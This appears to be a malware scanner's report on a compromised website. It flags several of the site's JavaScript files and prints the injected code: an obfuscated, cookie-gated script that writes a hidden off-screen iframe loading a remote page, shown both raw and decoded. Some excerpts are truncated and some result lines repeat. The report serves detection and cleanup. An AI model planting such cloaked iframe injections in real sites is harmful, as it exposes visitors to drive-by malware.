Scanned pages/files
Request | Server response | Status |
http://web-prodvijenie.ru/ | 200 OK Content-Length: 27635 Content-Type: text/html | clean |
http://web-prodvijenie.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 98437 Content-Type: application/javascript | clean |
http://web-prodvijenie.ru/media/system/js/core.js | 200 OK Content-Length: 6859 Content-Type: application/javascript | clean |
http://web-prodvijenie.ru/media/system/js/modal.js | 200 OK Content-Length: 11807 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see reports below). The same injected block appears in every file flagged on this page, prepended to the file's original content, so each flagged file needs to be cleaned, not only the first one listed. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' !1):this.asset},string:function(a){return a}});SqueezeBox.handlers.url=SqueezeBox.handlers.ajax;SqueezeBox.parsers.url=SqueezeBox.parsers.ajax;SqueezeBox.parsers.adopt=SqueezeBox.parsers.clone; Antivirus reports:
http://web-prodvijenie.ru//ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js/ | 500 Internal Server Error Content-Length: 878 Content-Type: text/html | clean |
http://web-prodvijenie.ru/test404page.js | 404 Not Found Content-Length: 518 Content-Type: text/html | clean |
http://web-prodvijenie.ru/media/k2/assets/js/k2.noconflict.js | 200 OK Content-Length: 2422 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see reports below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf'); if (cookie == undefined) { setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804); document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://oil.pesclubamerica.com/hrejerkthfeh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>'); } }; })(); var $K2 = jQuery.noConflict(); Decoded script: <iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
http://web-prodvijenie.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 9398 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see reports below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' $K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length); }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); Decoded script: <iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
http://web-prodvijenie.ru/media/system/js/caption.js | 200 OK Content-Length: 2804 Content-Type: application/javascript | clean |
http://web-prodvijenie.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 240406 Content-Type: application/javascript | clean |
http://web-prodvijenie.ru/templates/ot_corporatetree/scripts/dropdownMenu.js | 200 OK Content-Length: 6613 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see reports below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' sfHover = function() { var sfEls = document.getElementById("ot-mainmenu").getElementsByTagName("li"); for (var i = 0; i<sfEls.length; ++i) { sfEls[i].onmouseover = function() { this.className += " sfhover"; } sfEls[i].onmouseout = function() { this.className = this.className.replace(new RegExp(" sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); } Decoded script: function () { var sfEls = document.getElementById("ot-mainmenu").getElementsByTagName("li"); for (var i = 0; i < sfEls.length; ++i) { sfEls[i].onmouseover = function () {this.className += " sfhover";}; sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfhover\\b"), "");}; } } <iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
http://web-prodvijenie.ru/templates/ot_corporatetree/scripts/otscript.js | 200 OK Content-Length: 4862 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see reports below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' { var topboxes = $$('div.ot-topboxes div.otRounded-mid'); var maxHeight = 0; topboxes.each(function(item, index) { var height = parseInt(item.getStyle('height')); if(height > maxHeight) { maxHeight = height; } }); topboxes.setStyle('height', maxHeight + 'px'); } window.addEvent ('load', function() { equaHeightTopBox(); }); Decoded script: <iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
http://web-prodvijenie.ru/modules/mod_ot_scroller/js/jquery.tools.min.js | 200 OK Content-Length: 12310 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see reports below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' Decoded script: <iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
http://web-prodvijenie.ru//vk.com/js/api/openapi.js?60/ | 404 Not Found Content-Length: 528 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: web-prodvijenie.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 15:17:49 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7bad5c47e51dd58e24bbe2681002a0ee=a358e8334c06b69a9a299009c31c9a19; path=/
X-Logged-In: False
X-Powered-By: PHP/5.3.17
GET / HTTP/1.1
Host: web-prodvijenie.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 15:17:49 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7bad5c47e51dd58e24bbe2681002a0ee=a358e8334c06b69a9a299009c31c9a19; path=/
X-Logged-In: False
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: web-prodvijenie.ru
Referer: http://www.google.com/search?q=web-prodvijenie.ru
Result:
The response is similar to that of the first query; no suspicious redirects were found.
GET / HTTP/1.1
Host: web-prodvijenie.ru
Referer: http://www.google.com/search?q=web-prodvijenie.ru
Result:
The response is similar to that of the first query; no suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=web-prodvijenie.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web-prodvijenie.ru/
Result: web-prodvijenie.ru is not infected or malware details are not published yet.
Result: web-prodvijenie.ru is not infected or malware details are not published yet.